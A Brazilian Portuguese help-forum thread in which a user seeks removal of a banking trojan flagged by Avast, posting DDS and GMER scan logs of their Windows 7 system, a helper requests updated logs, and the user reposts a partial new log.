Ir ao conteúdo
  • Cadastre-se
manoelvalerio

Remover ameaça JS: Banker-QG[Trj]

Recommended Posts

Bom dia!

O Avast do meu pc envia alerta para a infecção: JS: Banker-QG[Trj].

O analista diego_moicano em 15/11/13, resolveu a mesma infecção. Posso utilizar ela, ou devo aguardar resposta dos meus scans?

Seguem os scans conforme solicitado pelo fórum.

Agradeço desde já.

DDS (Ver_2012-11-20.01) - NTFS_x86

Internet Explorer: 10.0.9200.16736 BrowserJavaVersion: 10.45.2

Run by 2011 at 11:11:02 on 2013-11-17

Microsoft Windows 7 Ultimate 6.1.7601.1.1252.55.1046.18.2046.1017 [GMT -2:00]

.

AV: avast! Antivirus *Disabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}

SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

SP: avast! Antivirus *Disabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

.

============== Running Processes ================

.

C:\Windows\system32\wininit.exe

C:\Windows\system32\lsm.exe

C:\Program Files\Software Plate\svcgdp.exe

C:\Program Files\AVAST Software\Avast\AvastSvc.exe

C:\Windows\system32\Dwm.exe

C:\Windows\Explorer.EXE

C:\ProgramData\eSafe\eGdpSvc.exe

C:\Windows\system32\taskhost.exe

C:\Program Files\AVAST Software\Avast\AvastUI.exe

C:\Program Files\Common Files\Java\Java Update\jusched.exe

C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe

C:\Windows\System32\spoolsv.exe

C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Windows\system32\SearchIndexer.exe

C:\Program Files\Windows Media Player\wmpnetwk.exe

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\explorer.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe -k GPSvcGroup

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\svchost.exe -k imgsvc

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

.

============== Pseudo HJT Report ===============

.

uStart Page = hxxp://www.22find.com/newtab?utm_source=b&utm_medium=gdp&from=gdp&uid=WDCXWD2500JS-75NCB3_WD-WCANKJ05479754797&ts=1359149649

uDefault_Page_URL = hxxp://www.22find.com/newtab?utm_source=b&utm_medium=gdp&from=gdp&uid=WDCXWD2500JS-75NCB3_WD-WCANKJ05479754797&ts=1359149649

mSearchAssistant = hxxp://search.22find.com/web/?utm_source=b&utm_medium=gdp&from=gdp&uid=WDCXWD2500JS-75NCB3_WD-WCANKJ05479754797&ts=1359149651

mCustomizeSearch = hxxp://search.22find.com/web/?utm_source=b&utm_medium=gdp&from=gdp&uid=WDCXWD2500JS-75NCB3_WD-WCANKJ05479754797&ts=1359149651

BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - c:\program files\microsoft office\office14\GROOVEEX.DLL

BHO: Java Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll

BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office\office14\URLREDIR.DLL

BHO: SpeedBit Link Verification Helper: {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - c:\program files\dap\LinkVerifier.dll

BHO: Java Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll

TB: Google Toolbar: {2318C2B1-4965-11D4-9B18-009027A5CD4F} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

uRun: [F.lux] "c:\users\2011\local settings\apps\f.lux\flux.exe" /noshow

uRun: [swg] "c:\program files\google\googletoolbarnotifier\GoogleToolbarNotifier.exe"

uRun: [Google Update] "c:\users\2011\appdata\local\google\update\GoogleUpdate.exe" /c

mRun: [AvastUI.exe] "c:\program files\avast software\avast\AvastUI.exe" /nogui

mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"

mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"

mPolicies-System: ConsentPromptBehaviorAdmin = dword:5

mPolicies-System: ConsentPromptBehaviorUser = dword:3

mPolicies-System: EnableUIADesktopToggle = dword:0

IE: &Download with &DAP - c:\program files\dap\dapextie.htm

IE: &Verify with DAP - c:\program files\dap\dapverify.htm

IE: Download &all with DAP - c:\program files\dap\dapextie2.htm

IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office10\EXCEL.EXE/3000

IE: E&xportar para o Microsoft Excel - c:\progra~1\micros~2\office11\EXCEL.EXE/3000

IE: Sothink Flash Downloader For IE - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm

IE: {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm

DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

TCP: NameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

TCP: Interfaces\{A2789148-CF95-4F73-990F-5895C4E94439} : DHCPNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - c:\program files\common files\microsoft shared\office14\MSOXMLMF.DLL

Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll

Name-Space Handler: FTP\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\dap\dapie.dll

Name-Space Handler: HTTP\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\dap\dapie.dll

SSODL: WebCheck - <orphaned>

SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office14\GROOVEEX.DLL

.

================= FIREFOX ===================

.

FF - ProfilePath - c:\users\2011\appdata\roaming\mozilla\firefox\profiles\1t2pwtzw.default\

FF - prefs.js: browser.search.selectedEngine - Google

FF - prefs.js: browser.startup.homepage - hxxp://www.22find.com/?utm_source=b&utm_medium=gdp&from=gdp&uid=WDCXWD2500JS-75NCB3_WD-WCANKJ05479754797&ts=1359149644

FF - prefs.js: network.proxy.http - 189.112.117.5

FF - prefs.js: network.proxy.type - 2

FF - plugin: c:\progra~1\micros~2\office14\NPAUTHZ.DLL

FF - plugin: c:\progra~1\micros~2\office14\NPSPWRAP.DLL

FF - plugin: c:\program files\adobe\reader 10.0\reader\air\nppdf32.dll

FF - plugin: c:\program files\foxit software\foxit reader\plugins\npFoxitReaderPlugin.dll

FF - plugin: c:\program files\google\update\1.3.21.165\npGoogleUpdate3.dll

FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll

FF - plugin: c:\users\2011\appdata\local\google\update\1.3.21.165\npGoogleUpdate3.dll

FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_8_800_168.dll

FF - plugin: c:\windows\system32\npDeployJava1.dll

FF - plugin: c:\windows\system32\npmproxy.dll

.

============= SERVICES / DRIVERS ===============

.

R0 aswRvrt;avast! Revert;c:\windows\system32\drivers\aswRvrt.sys [2013-3-3 49944]

R0 aswVmm;avast! VM Monitor;c:\windows\system32\drivers\aswVmm.sys [2013-3-3 178304]

R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2012-8-6 774392]

R1 aswSP;aswSP;c:\windows\system32\drivers\aswsp.sys [2013-11-8 403440]

R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver;c:\windows\system32\drivers\dtsoftbus01.sys [2012-9-15 242240]

R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2012-8-6 35656]

R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2012-8-6 70384]

R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2013-11-8 50344]

R2 svcgdp;software services;c:\program files\software plate\svcgdp.exe [2012-9-24 92800]

R2 WsysSvc;Wsys Service;c:\programdata\esafe\eGdpSvc.exe [2013-8-15 303680]

S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]

S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2013-6-21 162408]

S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]

S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2013-4-25 14848]

S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2013-4-25 49664]

S4 KMService;KMService;c:\windows\system32\srvany.exe [2012-8-7 8192]

.

=============== Created Last 30 ================

.

2013-11-13 01:25:21 1796096 ----a-w- c:\windows\system32\authui.dll

2013-10-24 11:51:52 94632 ----a-w- c:\windows\system32\WindowsAccessBridge.dll

2013-10-22 00:33:44 -------- d-----w- c:\users\2011\appdata\roaming\AVAST Software

.

==================== Find3M ====================

.

2013-11-09 00:36:36 774392 ----a-w- c:\windows\system32\drivers\aswSnx.sys

2013-11-09 00:36:36 70384 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys

2013-11-09 00:36:35 43152 ----a-w- c:\windows\avastSS.scr

2013-10-21 16:12:37 79720 ----a-w- c:\windows\system32\drivers\aswRdr2.sys

2013-10-21 16:12:37 49944 ----a-w- c:\windows\system32\drivers\aswRvrt.sys

2013-10-21 16:12:37 178304 ----a-w- c:\windows\system32\drivers\aswVmm.sys

2013-10-12 07:03:50 1767936 ----a-w- c:\windows\system32\wininet.dll

2013-10-12 07:02:33 2877952 ----a-w- c:\windows\system32\jscript9.dll

2013-10-12 07:02:29 61440 ----a-w- c:\windows\system32\iesetup.dll

2013-10-12 07:02:29 109056 ----a-w- c:\windows\system32\iesysprep.dll

2013-10-12 06:08:58 2706432 ----a-w- c:\windows\system32\mshtml.tlb

2013-10-12 05:15:39 71680 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe

2013-10-12 02:03:08 656896 ----a-w- c:\windows\system32\nshwfp.dll

2013-10-12 02:01:41 679424 ----a-w- c:\windows\system32\IKEEXT.DLL

2013-10-12 02:01:25 216576 ----a-w- c:\windows\system32\FWPUCLNT.DLL

2013-10-09 02:56:36 71048 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl

2013-10-09 02:56:36 692616 ----a-w- c:\windows\system32\FlashPlayerApp.exe

2013-10-05 19:57:25 1168384 ----a-w- c:\windows\system32\crypt32.dll

2013-10-04 01:58:50 152576 ----a-w- c:\windows\system32\SmartcardCredentialProvider.dll

2013-10-04 01:56:25 168960 ----a-w- c:\windows\system32\credui.dll

2013-10-03 01:58:07 305152 ----a-w- c:\windows\system32\gdi32.dll

2013-09-25 02:01:08 136640 ----a-w- c:\windows\system32\drivers\ksecpkg.sys

2013-09-25 02:01:06 67520 ----a-w- c:\windows\system32\drivers\ksecdd.sys

2013-09-25 01:57:46 99840 ----a-w- c:\windows\system32\sspicli.dll

2013-09-25 01:57:26 22016 ----a-w- c:\windows\system32\secur32.dll

2013-09-25 01:57:24 247808 ----a-w- c:\windows\system32\schannel.dll

2013-09-25 01:56:42 220160 ----a-w- c:\windows\system32\ncrypt.dll

2013-09-25 01:56:02 1038848 ----a-w- c:\windows\system32\lsasrv.dll

2013-09-25 00:49:20 22016 ----a-w- c:\windows\system32\lsass.exe

2013-09-25 00:49:18 15872 ----a-w- c:\windows\system32\sspisrv.dll

2013-09-14 00:48:58 338944 ----a-w- c:\windows\system32\drivers\afd.sys

2013-09-08 02:07:12 1294272 ----a-w- c:\windows\system32\drivers\tcpip.sys

2013-09-08 02:03:58 231424 ----a-w- c:\windows\system32\mswsock.dll

2013-09-04 01:15:32 258560 ----a-w- c:\windows\system32\drivers\usbhub.sys

2013-09-04 01:14:52 76288 ----a-w- c:\windows\system32\drivers\usbccgp.sys

2013-09-04 01:14:52 284672 ----a-w- c:\windows\system32\drivers\usbport.sys

2013-09-04 01:14:45 43008 ----a-w- c:\windows\system32\drivers\usbehci.sys

2013-09-04 01:14:45 20480 ----a-w- c:\windows\system32\drivers\usbohci.sys

2013-09-04 01:14:43 24064 ----a-w- c:\windows\system32\drivers\usbuhci.sys

2013-09-04 01:14:40 6016 ----a-w- c:\windows\system32\drivers\usbd.sys

2013-08-29 01:51:45 3969472 ----a-w- c:\windows\system32\ntkrnlpa.exe

2013-08-29 01:51:45 3914176 ----a-w- c:\windows\system32\ntoskrnl.exe

2013-08-29 01:50:30 1289096 ----a-w- c:\windows\system32\ntdll.dll

2013-08-29 01:50:16 619520 ----a-w- c:\windows\system32\tdh.dll

2013-08-29 01:48:17 640512 ----a-w- c:\windows\system32\advapi32.dll

2013-08-28 01:04:30 2348544 ----a-w- c:\windows\system32\win32k.sys

2013-08-28 00:57:20 434688 ----a-w- c:\windows\system32\scavengeui.dll

2013-08-24 11:59:27 773800 ----a-w- c:\windows\system32\msvcr100.dll

2013-08-24 11:59:26 421032 ----a-w- c:\windows\system32\msvcp100.dll

.

============= FINISH: 11:12:03,30 ===============

.

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.

IF REQUESTED, ZIP IT UP & ATTACH IT

.

DDS (Ver_2012-11-20.01)

.

Microsoft Windows 7 Ultimate

Boot Device: \Device\HarddiskVolume1

Install Date: 29/09/2011 10:03:29

System Uptime: 17/11/2013 10:28:59 (1 hours ago)

.

Motherboard: Dell Inc. | | 0WG864

Processor: Intel® Core2 CPU 6320 @ 1.86GHz | Microprocessor | 1862/1066mhz

.

==== Disk Partitions =========================

.

A: is Removable

C: is FIXED (NTFS) - 233 GiB total, 103,305 GiB free.

D: is CDROM ()

E: is CDROM ()

.

==== Disabled Device Manager Items =============

.

==== System Restore Points ===================

.

RP97: 24/10/2013 09:50:43 - Installed Java 7 Update 45

RP98: 31/10/2013 17:30:03 - Ponto de Verificação Agendado

RP100: 08/11/2013 22:35:17 - avast! antivirus system restore point

RP101: 13/11/2013 00:31:54 - Windows Update

.

==== Installed Programs ======================

.

Adobe Flash Player 11 ActiveX

Adobe Flash Player 11 Plugin

Adobe Reader X (10.1.8)

µTorrent

avast! Free Antivirus

BS.Player FREE

BS.Player PRO

CCleaner

CDBurnerXP

DAEMON Tools Lite

Daum PotPlayer 1.5.37776

Download Accelerator Plus (DAP)

F.lux

FormatFactory 3.1.1

Foxit Reader

Google Chrome

Google Toolbar for Internet Explorer

Google Update Helper

Java 7 Update 45

Java Auto Updater

Java 6 Update 30

JavaFX 2.1.1

K-Lite Codec Pack 9.1.0 (Full)

Microsoft .NET Framework 4 Client Profile

Microsoft Office 2010 Service Pack 1 (SP1)

Microsoft Office Access MUI (English) 2010

Microsoft Office Access Setup Metadata MUI (English) 2010

Microsoft Office Excel MUI (English) 2010

Microsoft Office Groove MUI (English) 2010

Microsoft Office InfoPath MUI (English) 2010

Microsoft Office OneNote MUI (English) 2010

Microsoft Office Outlook MUI (English) 2010

Microsoft Office PowerPoint MUI (English) 2010

Microsoft Office Professional Plus 2010

Microsoft Office Proof (English) 2010

Microsoft Office Proof (French) 2010

Microsoft Office Proof (Spanish) 2010

Microsoft Office Proofing (English) 2010

Microsoft Office Publisher MUI (English) 2010

Microsoft Office Shared MUI (English) 2010

Microsoft Office Shared Setup Metadata MUI (English) 2010

Microsoft Office Word MUI (English) 2010

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

Mozilla Firefox 20.0.1 (x86 pt-BR)

Mozilla Maintenance Service

PDFCreator

Quake III Arena

Samsung ML-1860 Series

Samsung Printer Live Update

Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368v2)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2686827)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2729449)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2737019)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2742595)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2789642)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2804576)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2835393)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628v2)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2858302v2)

Skype™ 6.6

Sothink SWF Decompiler

StreamTransport version: 1.0.2.2171

Update for Microsoft .NET Framework 4 Client Profile (KB2468871)

Update for Microsoft .NET Framework 4 Client Profile (KB2533523)

Update for Microsoft .NET Framework 4 Client Profile (KB2600217)

Update for Microsoft .NET Framework 4 Client Profile (KB2836939)

Update for Microsoft .NET Framework 4 Client Profile (KB2836939v3)

VLC media player 2.0.4

Winamp

Windows Media Player Firefox Plugin

WinRAR 4.10 (32-bit)

.

==== End Of File ===========================

GMER 2.1.19163 - http://www.gmer.net

Rootkit scan 2013-11-17 12:02:17

Windows 6.1.7601 Service Pack 1 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 WDC_WD25 rev.10.0 232,83GB

Running: gmer.exe; Driver: C:\Users\2011\AppData\Local\Temp\pxldipog.sys

---- System - GMER 2.1 ----

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwAddBootEntry [0x8D27CB10]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwAssignProcessToJobObject [0x8D27D5EE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateEvent [0x8D2895E0]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateEventPair [0x8D28962C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateIoCompletion [0x8D2897C6]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateMutant [0x8D28954E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateSection [0x8D289670]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateSemaphore [0x8D289596]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateThread [0x8D27DB24]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateThreadEx [0x8D27DD40]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateTimer [0x8D289780]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDebugActiveProcess [0x8D27E3DC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDeleteBootEntry [0x8D27CB76]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDuplicateObject [0x8D281B58]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwLoadDriver [0x8D27C75E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwModifyBootEntry [0x8D27CBDC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwNotifyChangeKey [0x8D281F4E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwNotifyChangeMultipleKeys [0x8D27EE6C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenEvent [0x8D28960A]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenEventPair [0x8D28964E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenIoCompletion [0x8D2897EA]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenMutant [0x8D289574]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenProcess [0x8D281452]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenSection [0x8D2896FE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenSemaphore [0x8D2895BE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenThread [0x8D28183A]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenTimer [0x8D2897A4]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwProtectVirtualMemory [0x914290CC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwQueryObject [0x8D27ED38]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwQueueApcThreadEx [0x8D27EA46]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetBootEntryOrder [0x8D27CC42]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetBootOptions [0x8D27CCA8]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwSetContextThread [0x91429316]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetSystemInformation [0x8D27C7F8]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetSystemPowerState [0x8D27C9CE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwShutdownSystem [0x8D27C95C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSuspendProcess [0x8D27E5A6]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSuspendThread [0x8D27E708]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSystemDebugControl [0x8D27CA56]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwTerminateProcess [0x91429194]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwTerminateThread [0x8D27E236]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwVdmControl [0x8D27CD0E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwWriteVirtualMemory [0x8D27D64A]

---- Kernel code sections - GMER 2.1 ----

.text ntkrnlpa.exe!ZwRollbackEnlistment + 142D 82A82A15 1 Byte [06]

.text ntkrnlpa.exe!KiDispatchInterrupt + 5A2 82ABC212 19 Bytes [E0, 0F, BA, F0, 07, 73, 09, ...] {LOOPNZ 0x11; MOV EDX, 0x97307f0; MOV CR4, EAX; OR AL, 0x80; MOV CR4, EAX; RET ; MOV ECX, CR3}

.text ntkrnlpa.exe!KeRemoveQueueEx + 10CB 82AC3460 4 Bytes [10, CB, 27, 8D]

.text ntkrnlpa.exe!KeRemoveQueueEx + 1153 82AC34E8 4 Bytes [EE, D5, 27, 8D]

.text ntkrnlpa.exe!KeRemoveQueueEx + 11A7 82AC353C 8 Bytes [E0, 95, 28, 8D, 2C, 96, 28, ...] {LOOPNZ 0xffffff97; SUB [EBP-0x72d769d4], CL}

.text ntkrnlpa.exe!KeRemoveQueueEx + 11B3 82AC3548 4 Bytes [C6, 97, 28, 8D]

.text ntkrnlpa.exe!KeRemoveQueueEx + 11CF 82AC3564 4 Bytes [4E, 95, 28, 8D]

.text ...

.text C:\Windows\system32\drivers\atikmdag.sys section is writeable [0x91C0B000, 0x227A14, 0xE8000020]

? C:\Users\2011\AppData\Local\Temp\mbr.sys O sistema não pode encontrar o arquivo especificado. !

---- User code sections - GMER 2.1 ----

.text C:\Windows\system32\csrss.exe[424] kernel32.dll!GetBinaryTypeW + 70 779969E4 1 Byte [62]

.text C:\Windows\system32\wininit.exe[496] kernel32.dll!GetBinaryTypeW + 70 779969E4 1 Byte [62]

.text C:\Windows\system32\csrss.exe[504] kernel32.dll!GetBinaryTypeW + 70 779969E4 1 Byte [62]

.text C:\Windows\system32\services.exe[544] kernel32.dll!GetBinaryTypeW + 70 779969E4 1 Byte [62]

.text C:\Windows\system32\lsass.exe[560] kernel32.dll!GetBinaryTypeW + 70 779969E4 1 Byte [62]

.text ...

---- Devices - GMER 2.1 ----

AttachedDevice \Driver\tdx \Device\Tcp aswTdi.sys

AttachedDevice \Driver\tdx \Device\Udp aswTdi.sys

---- Registry - GMER 2.1 ----

Reg HKLM\SOFTWARE\Microsoft\Windows Search\UsnNotifier\Windows\Catalogs\SystemIndex@{674D35C8-EA99-11E0-8C2B-806E6F6E6963} 4840062704

---- EOF - GMER 2.1 ----

---

Obrigado!

Manoel.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá

Desculpe a demora :)

Se ainda precisa de ajuda refaça os logs, pois preciso dos mesmos com datas atualizadas: Leia Antes de Postar - Criando um novo Tópico

ATENÇÃO 1: Não precisa abrir um novo tópico, coloque os novos logs neste mesmo tópico, obrigado!

ATENÇÃO 2: Não edite seu tópico, use o botão responder, obrigado!

ATENÇÃO 3: Não coloque os logs entre TAGS, obrigado!

ATENÇÃO 4: Não anexe os logs, obrigado!

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa noite Diego. Ainda preciso de sua ajuda!

Seguem os logs atualizados conforme solicitado.

Abraço!

DDS (Ver_2012-11-20.01) - NTFS_x86

Internet Explorer: 10.0.9200.16736 BrowserJavaVersion: 10.45.2

Run by 2011 at 23:13:55 on 2013-11-20

Microsoft Windows 7 Ultimate 6.1.7601.1.1252.55.1046.18.2046.960 [GMT -2:00]

.

AV: avast! Antivirus *Disabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}

SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

SP: avast! Antivirus *Disabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

.

============== Running Processes ================

.

C:\Windows\system32\wininit.exe

C:\Windows\system32\lsm.exe

C:\Program Files\Software Plate\svcgdp.exe

C:\Program Files\AVAST Software\Avast\AvastSvc.exe

C:\Windows\system32\Dwm.exe

C:\Windows\Explorer.EXE

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\taskhost.exe

C:\Program Files\AVAST Software\Avast\AvastUI.exe

C:\Program Files\Common Files\Java\Java Update\jusched.exe

C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe

C:\Windows\system32\SearchIndexer.exe

C:\Program Files\Windows Media Player\wmpnetwk.exe

C:\Windows\explorer.exe

C:\Program Files\Winamp\winamp.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Program Files\DAP\DAP.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe -k GPSvcGroup

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\svchost.exe -k imgsvc

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

.

============== Pseudo HJT Report ===============

.

uStart Page = hxxp://www.google.com

uDefault_Page_URL = hxxp://www.google.com

mSearchAssistant = hxxp://www.google.com

mCustomizeSearch = hxxp://www.google.com

